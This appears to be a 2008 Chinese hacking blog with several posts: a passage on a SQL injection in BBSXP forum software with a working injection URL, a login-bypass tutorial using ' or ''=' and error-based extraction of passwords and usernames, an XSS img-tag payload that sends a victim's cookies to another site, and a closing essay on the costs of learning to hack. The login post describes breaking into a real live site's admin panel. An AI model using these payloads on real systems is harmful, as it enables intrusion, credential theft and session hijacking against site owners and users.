接下来说一下产生漏洞的代码，找到Loading.asp的第一个搜索结果可以看到这段代码：
id=int(Request("id"))
ForumID=HTMLEncode(Request("ForumID"))
if id="0" then
if Request("ForumID")="0" then
sql="select * from [BBSXP_UsersOnline] where UserName<>'' and eremite<>1"
else
sql="select * from [BBSXP_UsersOnline] where ForumID="&ForumID&" and UserName<>'' and eremite<>1"
end if
从查询语句来看，这段代码应该存在数字型注入漏洞。然而它对ForumID却使用HTMLEncode方法进行过滤，也就是说除了单引号等特殊字符外，字母和常用符号都是可以通过验证的。为了证实这个想法，我在这段代码后加了一句“Response.Write(sql)”用来测试。
输入如下的URL：
“http://localhost/bbsxp/loading.asp?ForumID=0/**/select/**/username/**/from/**/bbsxp_user/**/select/**/*/**/from/**/bbsxp_usersonline/**/where/**/forumid=0”
空白页面上显示出我们所需要的查询语句：
select * from [BBSXP_UsersOnline] where ForumID=0/**/select/**/username/**/from/**/bbsxp_user/**/select/**/*/**/from/**/bbsxp_usersonline/**/where/**/forumid=0 and UserName<>'' and eremite<>1
这意味着构造的语句已经成功地通过了系统过滤。现在我们可以把URL中的“select/**/username/**/from/**/bbsxp_user”修改成任意的、不包含特殊字符的SQL查询语句。接下来的操作不用说了吧？不过有时候查询语句并不会直接显示在界面上，我们可以使用Sql Profile监视自己提交的查询语句。
由于论坛的安全性一般都比较高，所以漏洞查找……大多数时间跟大海捞针一样，只有掌握了一些方法的前提下才能在一定程度上简化这个过程。
本文简单给大家说了一下漏洞的发现过程，相对来说还是比较简单的一个。可能是因为BBSXP改版的过程中代码量较大而没有注意到这些细节的问题吧？在更多的时候每一个从客户端接收的变量都要经过几个方法之间的传递之后才会送到数据库里，对于这样的情况发现和测试都是比较困难的。不过万变不离其宗，只要你掌握了方法，多试几次总是可以找到的。你会渐渐的明白，大海捞针也并非不可能。
最后多嘴一句：实际上除了刚才说的漏洞之外还有一个不太显眼的漏洞，你可以尝试着去搜索一下。这个问题就留给大家了，要相信你自己一定会找到的！

轻松饶过登陆表单

mhnf@163.com(网络人生) — Thu, 12 Jun 2008 04:04:35 +0800

在脚本入侵的过程中，相信每位朋友都面对过表单登陆，特别是管理员后台登陆界面。所以，我今天特别把以前自己在这方面的心得和方法写出来，和大家一起分享。
小知识：表单是用于实现网页浏览者与服务器之间信息交互的一种页面元素，它由表单控件和一般内容组成。它一般包括两个部分：一部分是HTML源代码用于描述表单（例如，域，标签和用户在页面上看见的按钮），另一部分是脚本或应用程序用于处理提交的信息（如CGI脚本）。不使用处理脚本就不能搜集表单数据。表单由文本域、复选框、单选框、菜单、文件地址域、按钮等表单对象组成，所有的部分都包含在一个由标识符标志起来的表单结构中。表单的种类有注册表、留言薄、站点导航条、搜索引擎等。
从大体上来分，如果登陆界面不需要输入验证码的话。我们入侵可以分为两类。一种是爆力破解账号，这是一种最原始的入侵方法，不过成功的机率不是很大。写一个程序，POST提交表单参数再比较返回的页面，就知道是否正确了。当然，账号和密码是以挂字典的方法来破解的（如小榕的溯雪基本原理就是那样），如果管理员的账号和密码不在字典中，那么就永远破解不出来了。所以一般是在实在没有办法的情况下才会出此下策，成不成功都是看运气成分居多。入侵其实是一种实力+运气的最好体现，如何体现自己的入侵能力呢？一起来看看下面的第二种方法。
第二种是通过脚本漏洞入侵，这是比较精彩的地方。我们先一起来分析一下。
如果脚本存在漏洞，那么我们如果要入侵服务器就变得就相对简单一些。登陆表单永远是和数据库紧密的联系在一起的，拿到数据库的账号和密码就可以成功登陆了，而通过注入当然可以拿到账号和密码。这也是一种方法，不过如果要更灵活的运用，我们用不着那么麻烦，来看看最古老的方法吧。
从单引号着手。如果没有过滤单引号，那么我们在账号和密码输入框中输入“’ or ‘’=’（不包括引号，下同）”，多数情况下可以进入后台（是谁发现这个漏洞的？实在太经典了，让人受益非浅)！为什么说是没有过滤单引号的时候是“多数”情况下可以进入呢？意思是还有少数情况不能进入？对，这也将是我们今天分析的重点。先让大家来看看我的分析吧。GO……
通过“’ or ‘’=’ ”进入后台，脚本代码是这么写的，看代码：
……
Dim Usernaem，password，sql
username = request。form(“username”)
password = request。form(“password”)
sql = “select * from admin where username=’”&username&”’ and password=’”&password&”’”
……
直接把表单参数放到数据库中去查询，如果返回不是EOF、BOF，那么登陆就成功，反之不成功。所以我们在账号和密码中输入“ ‘or ‘’=’”放到数据库中去查询，将永远只拿到NOT（EOF or BOF），也就是永远会存在记录的（除非数据库中没有记录，可能的机会万分之一），当然就顺利进入后台管理了。不过如果脚本不是这么写的，利用这种方法就不会成功。我相信大家一定遇到过这种情况，明明没有过滤单引号，但是利用“’ or ‘’=’”进不到后台。这种情况就是脚本编写人员的另一种编程思路了。再来看我的分析，还是来先看代码：
……
Dim Usernaem，password，sql
username = request。form(“username”)
password = request。form(“password”)
sql = “select password from admin where username=’”&username&”’”
rs。open sql，conn，1，1
if ont (rs.eof or rs.bof) then
if rs(“password”)=password then
……登陆成功
end if
end if
……
看完了代码，你应该明白其中的思路了吧？脚本编写人员先在数据库中去查找表单中提交的用户名，找到后再把数据库中的密码和表单中提交的密码相比较，如果表单中输入的密码和数据库中的密码相同，那么就登陆成功。
面对这种情况，我们也是有办法的。想想表单参数中的账号参数是没有过滤单引号的，那么我们输入“‘ or ‘’=’”会找到一条记录。脚本会取回找到的这条相应记录的密码再和我们输入的密码进行比较，现在我们关键就是不知道密码是多少了！用“’or ‘’=’”永远是取的数据库的第一条记录，我们可以改变他的顺序取到我们想要的记录！看下面的一个表：
----------------------+-------------------，
username password
----------------------+------------------
Test 123456
admin admin123
ms mszr
…… ……
上面是管理员表的记录，采用“’or ‘’=’”取得的是第一条记录，如果我们在账号中输入“‘ or password=’admin123’ and ‘’=’”，如果密码是正确的得到的相应记录就是第二条记录，再在密码中输入admin123我们就成功的进入了后台。不过这样做的前提是知道了密码，对于我们来说也有一定的困难，但是这也是一种思路，比如对方如果采用MSSQL数据库我们就有机会拿到他的密码，让我们把密码给他爆出来吧。来，在账号中输入“‘ and password>1 and ‘’=’”，通过爆字段值的方法，在IE中就返回了密码的值。现在有了密码就可以通过上面的方法进入了。再来换个思路，我们一样可以拿到账号名字，上面已经拿到密码了，现在我们就来拿他的账号吧，一样通过爆字段的方法来拿。输入“‘ or password=’admin123’ and username>1 and ‘’=’”，在IE中爆出了账号，这样账号也就拿到了。有了账号和密码我们就可以名正言顺地进入后台了！
上面我们分析了一大把，现在是时候让我们来消化消化了，多吃不消化可不是学习的好方法。在网上找个登陆入口吧，随便找了一个，我在用户名和密码中先分别输入单引号。
看到上面的提示，大家应该知道这是没有过滤单引号的情况下返回的错误信息，再进一步看看是哪个参数没有过滤。我现在只在账号中输入单引号，密码不输入，返回同样的结果。证明至少表单中的账号参数是没有过滤的。再来看看表单中密码参数是否过滤了，我现在在账号中输入1234，密码中输入一个单引号。返回用户名不存在的提示。
证明密码字段是过滤的，要不然就是根本没有放到数据库中去查询。
小提示：一般说来账号没有过滤，密码也不会过滤，很多实际的情况下是先到数据库中去取回相应账号的密码，再进行比较。

就按照第二种方法的思路，我们先拿一个密码吧。密码字段是多少？80%都可以猜到的。先看看网页表单的源代码，看看那个密码框的名字“name=password”试试“password”，在账号中输入“’ and password>1 and ‘’=’”，提示“password”不是有效的字段名，看来不是这个，换换常用的试试“userpassword”，输入“’ and userpassword>1 and ‘’=’”，好了，爆出密码竟然是：“fuckusa（呵呵，很爱国啊！我绝不会黑了它，测试好我就闪人，随便给管理员写封EM，提醒下注意安全）”，现在我们来拿账号吧，在账号框中输入“’ or userpassword=’fuckusa’ and username>1 and ‘’=’”直接爆出账号了，证明我们字段名是猜对的。账号是“admin”，现在我们拿着账号的密码来登陆吧！OK，成功返回管理页面。

利用Ajax方式盗取Cookies

mhnf@163.com(网络人生) — Wed, 11 Jun 2008 04:02:34 +0800

一个简单的httprequest声明以及提交的过程

<img src="javascript:
//这里先要把XMLHttpRequestObject设置为false来验证声明httprequest时是否为true
var XMLHTTPRequestObject = false;
if (window.XMLHttpRequest)
{
XMLHttpRequestObject = new XMLHttpRequest();
}
else if(window.ActiveXObject)
{
XMLHttpRequestObject = new ActiveXObject("Microsoft.XMLHTTP");
}
else
{
alert("Javascript must be enabled to continue.");
}
function socket()
{
//下面这行将非常重要.注意cookies是以参数的形式进行提交的

XMLHttpRequestObject.open('GET', 'http://www.site.com/privatemessage.php?
user=yourusername&subject=' + window.document.cookie, true);
XMLHttpRequestObject.setRequestHeader("Content-Type", "application/x-www-form-urlencoded");
XMLHttpRequestObject.send(null);
//这句执行完，我们就可以放下心来了。
delete XMLHttpRequestObject;
}
//不要忘记这是一张图片，所以我们必须关闭标签
window.document.onload='socket();'">

黑客之路

mhnf@163.com(网络人生) — Tue, 10 Jun 2008 01:26:29 +0800

在一个朋友那转来的，写的很好！老风我发这了你别骂我！

错，错就错在立志学黑客，学什么不好，非要搞黑？

学电脑没错，学硬件没错，学软件也没错，图形美工更没错……错就错在学黑客。

黑客？传说中的计算机行业的最精之英了……那意味着什么？意味着放弃。

从电子网络专业到偷偷学习黑客，已经七年整了，其中辛酸愁苦只有个人知晓。

1.至少精通2个操作系统

从windows操作，管理，工具使用，安全配置，到系统内幕，底层驱动这需要多少时间……？

从linux的基本操作，到去睹shellcode，联系到bsd/其他unix系统，这又需要多少时间……？

2.至少精通一门程序

从c语言到c++，数据结构，算法（加密解密），单单这些，又需要多少时间……？

而且不排除网络程序，从perl学到php，asp，jsp又是热门，能不学吗？光这些，又需要多少时间……？

3.图形美工

作为hacker，当然要精通pc行业里的绝大多数东西了,从最底层的html，到flash，这些学习要多少时间……？

而且偏又碰到我这刁钻爱美的人，能做到真正的赏心悦目又需要多少时间……？单单这些，深点呢，dx，3dmax，玛雅……这些又都是需要一辈子去学习的东西……？

4.硬件

装pc算不算难？……需要多少时间？换服务器呢？……？多少时间？故障排除处理呢？这需要多少时间和经验……？

5.破解

单单一门汇编，学好需要多少时间？外加破解呢，又需要多少时间？……

6.数据库

从mssql……mysql……oracle单单这几个数据库需要多少时间……？other……够了！！！！！

能学懂这些我承认，你已经老大的了不得了，可这些只是学黑客之路的一小部分而已……，而且，我们需要的是学精通，不仅仅是懂。

传说中的黑客是很cool很有“钱”途的一群家伙，可技术归技术，肚子归肚子……

有谁，什么部门无聊到养活一些吃白饭的黑客？于是……

跑路，找人介绍工作，做工程，参加培训……工资低的可怜，房租都交不起。电费另算，肚子都哄不饱，哪儿有他吗的兴趣搞黑客？

电视中的黑客都是小资到白领，日子过的舒服，唯一烦恼大约便是爱情，试问有哪个黑客能在学习完上面那些东西?

还有时间去泡mm，穿白领？爱情？这两个字大约都是传说中的东西吧，搞技术的人，有几个懂风花雪月的，有几个有时间的？

记得一次看电视剧，满有意思的是国内某帅哥（陆毅）的一部爱情剧吧，故事满好，2公司在一层楼上。一个搞房地产，外一个搞网站。

一个mm多（推销嘛），外一个老爷们多（混日子），有mm和bb集中的地方，当然关于if mm that bb这类的输出会有好多于是，故事开始，……

我讲的并不是这个故事，而是其中一个细节，网络公司有bb和地产公司的mm吵架，很是不服气，传说中的一个高手（诞生于上海)入侵开始......

（我可没鼓励你入侵，如果你能成功，你牛，认你老大）

平台：windows98

工具：telent

漏洞？？？？？？？？？？？？什么东西？

测试方法：

telnet 到对方98下（居然2个都是modem），有email的前提下，test密码，测试方法很有意思：名字=密码，测试成功。……控制成功（怎么做的？我不会）

惊讶：

被入侵的98系统，类似有GUI的木马似的，鼠标打开一个画板：大大写了2个字：傻瓜……

思考：汗，黑客就是牛，98这种单用户系统也能用telnet入侵，而且居然没有任何工具情况下，有类似木马的功能？

高手……，商业中抄作的黑客真的很牛x……（如果我是那个bb该多好，技术太牛了，98也能那样入侵^-^）

要知道黑客研究的可不仅仅是入侵，更多是防御，加固系统，内核…… 哦，如果你不想那么深入夸大，请问：简单入侵+渗透+经验+写*****，光这些需要多少时间?

学会这些能干些什么？---------------最大可能：进班房！

网络上，关于黑客的介绍太多太多了，可怎么做到一个黑客，却没有人教我们，告诉我们？更多的是思考，时间……

请问：

黑客，这2个字，你思考过吗？下过多少时间？多少工夫？

我的一些感受：

虽然是短短的7年时间，可感觉却是一辈子那么漫长，……为了这2个字，我扔掉了多少个方便面箱子，吃了多少个烧饼？

（哪儿有钱呀，有钱人---特指：10-30的年纪，有人学黑客，我靠，在哪儿，我都没听说过）

错过了多少传说中的爱情故事？垮了多少次的身体，熬多少个晚上（通宵）……看着朋友们的身边都伴着小鸟依人的mm！那心情我想你也懂，

再让你试一试，坐在电脑旁边几天几夜，是什么感觉，任何正常人都会有发疯的感觉？不发疯？那我佩服你，请你当我心理医生吧!

为了pc，我失去的太多，没有得到吗？当然有，可仅仅是成功的一刻而已！毕竟，比起我们生活外面的世界……少多少？

而且，写出东西也只是圈子内的人看/用，圈子外的世界有多少人承认你？就算你是中国第一黑客（入侵技术），一个MBA站在你身边，我想他还是会看不起你

在此，我想劝劝那些还在偷qq号码的哥们，没有学黑客以前，你不要进这个圈子，学了呢，尽你最大努力，做不好也没关系。劝大家学黑客以前更多一点时间去思考……

我不劝大家放弃，只是要大家仔细的去走这条路，实话：曾经有份非常好的专业让我选择，可我没有好好珍惜，知道失去才后悔莫及，如果上天能再给我一次机会的话，

我一定不去碰电脑，更不去学什么黑客......